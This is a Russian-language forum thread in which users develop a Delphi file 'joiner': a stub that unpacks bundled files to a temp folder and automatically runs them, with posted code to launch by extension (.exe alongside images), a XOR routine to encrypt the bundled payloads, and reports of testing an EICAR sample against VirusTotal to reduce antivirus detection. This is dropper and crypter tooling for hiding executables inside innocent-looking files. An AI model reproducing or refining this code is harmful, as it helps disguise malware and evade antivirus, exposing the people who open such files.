ВАЖНО А не написать-ли нам Джойнер самим !?

[X-Shar]

Олег,а можно сделать без этого вбивания вручную имён?

Ну если это так важно для тебя, можно сделать что-бы запускалось без ввода вручную, в стабе найди этот код:

Скопировать в буфер обмена

for i:=0 to 100 do
	begin
	  if (_fileHeader._filenameStart[i]<>'') then
		ShellExecute(0,nil,pchar(string(ShortPath)+string(_fileHeader._filenameStart[i])),nil,nil,SW_SHOW);
	end;

Закоментарь его, а вместо него вставь это:

Скопировать в буфер обмена

ShellExecute(0,nil,pchar(string(ShortPath)+string(_fileHeader._filename[i])),nil,nil,SW_SHOW);

Теперь стаб будет запускать все склеенные файлы...

Что-бы запускать по расширению нужно парсить _fileHeader._filename тут хранится имя файла, т.е. нужно в цикле определить файлы по расширению и их запускать, пример:

Скопировать в буфер обмена

Index:Integer;
 
for i:=0 to 100 do
 
begin
 
Index := Pos('.exe', _fileHeader._filename[i] ); //Проверяем есть-ли .exe в имени
 
// Если экзешник то запускаем
 
if (Index>0) then ShellExecute(0,nil,pchar(string(ShortPath)+string(_fileHeader._filename[i])),nil,nil,SW_SHOW);
 
end

Ну и не забудь потом поменять константу: const mySize=17920; это размер стаба, если неправильно укажешь размер, стаб не заработает !

 

[Антоха]

Ну и не забудь потом поменять константу: const mySize=17920; это размер стаба, если неправильно укажешь размер, стаб не заработает !

Благодарю,Олег!Будем пробовать.
P.S.Индийский код с комментариями -классный !
Кстати вот ещё пример джойнера на делфи.В архиве

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

(там можно посмотреть и другие продукты DH).

Спойлер: видос

и ещё

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

написанные на PERL.

 

[X-Shar]

P.S.Индийский код с комментариями -классный !

Индийский, это потому-что был глюк непонятно из-за чего, а решение было так-себе, хотя работает и ладно...

Я вообще хочу всё переделать по нормальному !

Что-бы запускать по расширению, сделай так, найди в стабе этот код:

Скопировать в буфер обмена

	for i:=0 to 100 do
		begin
		  if (_fileHeader._filenameStart[i]<>'') then
			ShellExecute(0,nil,pchar(string(ShortPath)+string(_fileHeader._filenameStart[i])),nil,nil,SW_SHOW);
		end;

И замени на это:

Скопировать в буфер обмена

jpg:Integer;
exe:Integer;
png:Integer;
gif:Integer
for i:=0 to 100 do
begin
exe := Pos('.exe', _fileHeader._filename[i] ); //Проверяем есть-ли .exe в имени
jpg := Pos('.jpg', _fileHeader._filename[i] ); //Проверяем есть-ли .jpg в имени
png:=Pos('.png', _fileHeader._filename[i] ); //Проверяем есть-ли .pngв имени
gif:=Pos('.gif', _fileHeader._filename[i] ); //Проверяем есть-ли .gif в имени
// Теперь если вхождения есть, то запускаем:
if (exe>0) or  (jpg>0) or (png>0) or (gif>0) then ShellExecute(0,nil,pchar(string(ShortPath)+string(_fileHeader._filename[i])),nil,nil,SW_SHOW);
 end

Запустит только файлы с расширением exe, jpg, png, gif, а другие запускать не будет !

Тут всё очень просто, функцией Pos проверяем вхождение в строку, строки ".exe", если вхождение есть, то функция вернёт значение >0, далее проверяем больше нуля-ли переменная exe, если да, то запускаем файл при помощи API винды ShellExecute:

В данном случае так:ShellExecute(0,nil,pchar(string(ShortPath)+string(_fileHeader._filename)),nil,nil,SW_SHOW);

Проверку делаем в цикле, ах-да я не написал, здесь есть ограничение на склейку, максимум можно склееть 100 файлов, т.к. я не использую динамические массивы...

Это ограничение можно увеличить, если нужно !

 

[X-Shar]

Вот по быстрому накидал:

1)Будет автоматически запускать png,exe,gif,pdf,jpg,txt

2)Добавил шифрование XOR;

Тут всё просто, в стабе для расшифровки сделал самописную функцию алгоритма XOR:

Шифровка-Расшифровка в данном случае одно и тоже, т.к. функция обратима, читайте про алгоритм XOR !

Скопировать в буфер обмена

function XorCrypt(Mes: Char): Char;  //Вспомогательная функция для шифрования XOR
var i,Key: integer;
	s: Char;
begin
s:=mes;
Key:=111;  //Это ключ
s:=Chr(ord(mes)  xor Key);  // Шифруем
Result:=s;  //Результат
end;

Далее, где идёт распаковка, просто шифруем _buf:

Скопировать в буфер обмена

for j:=1 to _fileHeader._filesize[i] do
begin
ReadFile(_fileSource, _buff, sizeOf(_buff), _temp, nil);//Считываем данные из стаба в _buff)
_buff:=XorCrypt(_buff);// Расшифровываем эти данные
WriteFile(_fileDist, _buff, sizeOf(_buff), _temp, nil);//Записываем расшифрованные данные в распакованный файл
end;

В конструкторе немного по другому, т.к. данные идут блоком:

Скопировать в буфер обмена

repeat
ReadFile(_fromFile, _buff, sizeOf(_buff), _temp, nil); //Считываем данные из фала, который хотим склееть в _buff
for m:=0 to sizeOf(_buff)-1 do
  _buff[m]:=Chr(ord(_buff[m])  xor Key);	//Шифруем эти данные с ключом Key=111
WriteFile(_distFile, _buff, _temp, _temp2, nil); //Записываем эти шифрованные данные в стаб
ZeroMemory(@_buff, sizeOf(_buff));//Чистим память
until _temp<>1025;

Обновил исходники и бинарники, пароль:111

 

[X-Shar]

2)Добавил шифрование XOR;

Вот склеил с картинкой EICAR, сбил детект, хотя большенство всё-равно детектят:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Пароль:111

 

[X-Shar]

Без шифрования то-же самое:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Убрался детект Доктор Веба, что-то я ничего не понимаю !

Пароль:111

 

[X-Shar]

Что-то я не пойму как работает детект на ВТ, это не сигнатурный детект, вот для примера EICAR, изначально детектят почти все:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Далее если склеить моим джойнером остаётся 17, причём без разницы криптовать файлы или нет, выходит на ВТ тестятся и на запуск файлы тоже, иначе как они обнаруживают какой файл запускается из темпа !

 

[Антоха]

Что-бы запускать по расширению, сделай так, найди в стабе этот код:

Я тут могу и своих расширений дописать.Вот отлично когда код так подробно раскладывают,до мелочей.А то часто мануалы рассчитаны на более-менее прошареных в кодинге.
Я сейчас попробовал склеить скрин в формате png с экзешничком и нифига,запустился только экзе.Дело было в буквах:)У меня "ножницы" сохраняют так file.PNG,а в коде просто png.После склейки ,безопасные файлы стали иметь такой

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

.

 

[X-Shar]

После склейки ,безопасные файлы стали иметь такой рейтинг на ВТ.

Это из-за шифрования, только хуже сделал...

Старый стаб:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Новый с шифрованием:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Доктор веб начал детектить из-за шифрования файлов !

 

[Антоха]

Олег,а у меня другие данные по твоиему старом стабу:)
Старый стаб:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Новый с шифрованием:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Правда хэш у нас с тобой не совпадает у старых стабов.